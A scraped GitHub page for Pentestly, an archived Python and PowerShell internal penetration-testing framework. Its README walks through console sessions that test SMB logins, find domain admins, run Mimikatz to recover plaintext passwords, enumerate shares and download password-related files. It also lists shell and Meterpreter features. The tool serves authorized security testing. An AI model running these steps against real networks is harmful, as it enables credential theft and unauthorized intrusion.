• This repository has been archived on 09/Apr/2024
  • Stars
    star
    717
  • Rank 63,167 (Top 2 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created over 8 years ago
  • Updated over 8 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Python and Powershell internal penetration testing framework

Pentestly

Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python.

Blog post: Pentestly Framework: When Pentesting Meets Python and Powershell

Author: @ctfhacker / Cory Duplantis

Demo

asciicast

Current features

  • Import NMAP XML
  • Test SMB authentication using:
    • individual credentials
    • file containing credentials
    • null credentials
    • NTLM hash
  • Test local administrator privileges for successful SMB authentication
  • Identify readable SMB shares for valid credentials
  • Store Domain/Enterprise Admin account names
  • Determine location of running Domain Admin processes
  • Determine systems of logged in Domain Admins
  • Execute Powershell commands in memory and exfil results
  • Execute Mimikatz to gather plaintext password from memory (Invoke-Mimikatz.ps1)
  • Receive a command shell (Powercat)
  • Receive a meterpreter session (Invoke-Shellcode.ps1)

Shoulders of Giants

Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

  • recon-ng - Backend database for recon-ng is beautifully made and leveraged in Pentestly for data manipulation

  • wmiexec.py - Allows us to execute Powershell commands quickly and easily via WMI

  • smbmap.py - Useful utility for enumerating SMB shares

  • Invoke-Mimikatz.ps1 - Implementation of Mimikatz in Powershell

  • powercat.ps1 - Netcat-esque functionality in Powershell

  • Invoke-Shellcode.ps1 - Deploy Meterpreter in Powershell

  • CrackMapExec - Source of inspiration for the simple Mimikatz server in Pentestly

Install

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Usage

Let's walk through several functions currently implemented.

Change workspace

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Load from nmap

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Test logins

Use file with creds to test login

[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

Use single username password

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Use credentials over a small subset of IPs i.e. over the 192.168.8.0/24 found in the table

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Gather Domain and Enterprise admins

[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2

Run mimikatz over IPs with executable rights

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:p@$$w0rd  - DOMAIN ADMIN!

Show local admins

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Show domain admins

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Enumshares

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Show new shares

[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid |       host      |    username   | readwrite |      readonly     | noaccess |   module   |
+-------------------------------------------------------------------------------------------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------------------------------------------------------------------------------------------------+

Find/Download interesting files

[pentestly][default][interesting_files] > show options

    Name     Current Value                                                                                                                              Required  Description
    -------  -------------                                                                                                                              --------  -----------
    PATTERN  (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$  yes       Regex pattern to look for in filenames
    SOURCE   default                                                                                                                                    yes       source of input (see 'show info' for details)

Can change the pattern to something a bit more specialized

[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options

    Name     Current Value               Required  Description
    -------  -------------               --------  -----------
    PATTERN  important.txt|super_secret  yes       Regex pattern to look for in filenames
    SOURCE   default                     yes       source of input (see 'show info' for details)

Execute and download found files

[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:[email protected]
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt

Contributing

Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py:

from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):

    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            ('Option1', 'Default Value', Required-True/False, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options
        
        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")
        
        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)

        # self.alert - print successful message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module

The key points here are to fill the meta dict with the corresponding information as well as the module_run function for module functionality.

This script is then placed in the modules/ folder or in your personal ~/.pentestly/modules folder for portability.

Stay tuned for a detailed example script explanation in the coming weeks.

TODO

  • Implement secretsdump.py module
  • Add utility functions for database queries similar to creds, services
  • Rework draw_table function to have fixed width columns
  • Import credentials from Gladius
  • Implement GPP password search and decrypt module
  • Look into utilizing Invoke-Shellcode

Changelog

0.1.0 (2016-02-18)

Initial release

More Repositories

1

gokart

A static analysis tool for securing Go code
Go
2,176
star
2

noseyparker

Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.
Rust
1,657
star
3

Hob0Rules

Password cracking rules for Hashcat based on statistics and industry patterns
1,441
star
4

purple-team-attack-automation

Praetorian's public release of our Metasploit automation of MITRE ATT&CKâ„¢ TTPs
Ruby
713
star
5

PortBender

TCP Port Redirection Utility
C
668
star
6

DVRF

The Damn Vulnerable Router Firmware Project
HTML
668
star
7

fingerprintx

Standalone utility for service discovery on open ports!
Go
561
star
8

gato

GitHub Actions Pipeline Enumeration and Attack Tool
Python
539
star
9

trudy

A transparent proxy that can modify and drop traffic for arbitrary TCP connections.
Go
275
star
10

pyshell

PyShell makes interacting with web-based command injection less painful, emulating the feel of an interactive shell as much as possible.
Python
253
star
11

mitm-vm

An easy-to-deploy virtual machine that can provide flexible man-in-the-middle capabilities.
Shell
195
star
12

gladius

Automated Responder/secretsdump.py cracking
Python
181
star
13

snowcat

a tool to audit the istio service mesh
Go
173
star
14

vulcan

a tool to make it easy and fast to test various forms of injection
C++
172
star
15

ADFSRelay

Proof of Concept Utilities Developed to Research NTLM Relaying Attacks Targeting ADFS
Go
171
star
16

goffloader

A Go implementation of Cobalt Strike style BOF/COFF loaders.
Go
151
star
17

trident

automated password spraying tool
Go
145
star
18

NTLMRecon

A tool for performing light brute-forcing of HTTP servers to identify commonly accessible NTLM authentication endpoints.
Go
79
star
19

epictreasure

radare, angr, pwndbg, binjitsu, ect in a box ready for pwning
Shell
75
star
20

INTRACTABLEGIRAFFE

A Proof of Concept Rootkit Demonstrating Keylogging and Virtual File System (VFS) Capabilities
C
73
star
21

hashcatJS

An implementation of the hashcat rules engine in javascript
JavaScript
47
star
22

proxylogon-exploit

Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065. Unauthenticated RCE in Exchange.
Python
45
star
23

slack-c2bot

Slack C2bot that executes commands and returns the output.
Go
44
star
24

ruby_hashcat

Command line wrapper, Library, and Rest API for oclHashcat.
Ruby
40
star
25

dert

DNS Enumeration and Reconnaissance Tool
Ruby
37
star
26

Matryoshka

Matryoshka loader is a tool that red team operators can leverage to generate shellcode for Microsoft Office document phishing payloads.
C
37
star
27

Okta_Watering_Hole

Next Generation Phishing Tool For Internal / Red Teams
Python
35
star
28

ctf-writeups

Collection of Praetorian solutions to CTF challenges
OpenEdge ABL
25
star
29

chariot-ui

Chariot Offensive Security Platform
TypeScript
21
star
30

konstellation

Konstellation is a configuration-driven CLI tool to enumerate cloud resources and store the data into Neo4j.
Cypher
19
star
31

bsidesaustin

Python
14
star
32

chariot-launch-nuclei-templates

12
star
33

burp-wcf-gzip

Burp extension for decoding WCF-gzipped requests.
Python
12
star
34

gcloud-lockdown

Scripts to demonstrate VPC Service Controls between tenant and shared projects
Shell
12
star
35

highlight

Text file to BMP image with box drawing and blurring from the command line
C
9
star
36

log4j-detector

Log4j detector and reporting server for scalable detection of vulnerable running processes.
Go
7
star
37

sonicwall-nsv-decrypter

C
6
star
38

aws-labs

Shell
5
star
39

tpm_bound_sa_key

Go
5
star
40

rpi-setup

set up rpi for zbwardrive
Python
5
star
41

zeroqlik-detect

A Nuclei template to detect ZeroQlik (CVE-2023-41265 and CVE-2023-41266)
4
star
42

product-frontend-interview

JavaScript
3
star
43

product-backend-interview

Java
1
star
44

praetorian-cli

CLI and SDK for interacting with the Praetorian Chariot platform
Python
1
star